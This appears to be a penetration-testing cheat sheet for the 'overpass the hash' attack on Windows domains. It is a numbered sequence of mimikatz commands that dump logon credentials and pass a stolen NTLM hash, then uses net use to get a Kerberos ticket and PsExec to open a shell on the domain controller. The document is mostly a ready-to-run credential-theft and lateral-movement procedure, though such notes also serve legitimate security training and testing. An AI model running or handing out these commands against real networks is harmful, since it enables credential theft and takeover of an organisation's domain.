Overpass the hash
With overpass the hash, we can "over" abuse an NTLM user hash to obtain a full Kerberos Ticket Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as that user.
1) Transfer all three mimikatz files to the target and run mimikatz.exe
mimikatz.exe
2) Request debug privileges
privilege::debug
3) sekurlsa::logonpasswords
Dump the user's NTLM hash. Skip this step if you already have the hash.
4) sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe
At this point, we have a new PowerShell session that allows us to execute commands as
<user>.
5) exit mimikatz
6) klist
No Kerberos tickets have been cached, but this is expected since <user> has not performed
an interactive login.
7) net use \\<dc_machine_name>
Authenticating to a network share on the domain controller (or to another service) with net use makes the new session request a Kerberos TGT for <user>.
8) klist
We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM), such as the official PsExec application from Microsoft.
9) .\PsExec.exe \\<dc_machine_name> cmd.exe
10) ipconfig
Running ipconfig confirms that the shell is on the domain controller: we have successfully reused the Kerberos TGT to launch a command shell there.